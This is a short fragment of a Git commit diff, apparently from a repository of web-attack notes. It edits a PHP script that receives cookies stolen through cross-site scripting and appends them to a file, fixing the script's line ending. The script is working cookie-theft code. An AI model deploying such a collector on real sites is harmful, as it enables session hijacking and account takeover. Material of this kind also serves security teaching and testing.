commit
b5e511c03b
|
@ -82,7 +82,7 @@ Write the collected data into a file.
|
|||
<?php
|
||||
$cookie = $_GET['c'];
|
||||
$fp = fopen('cookies.txt', 'a+');
|
||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
||||
fwrite($fp, 'Cookie:' .$cookie."\r\n");
|
||||
fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue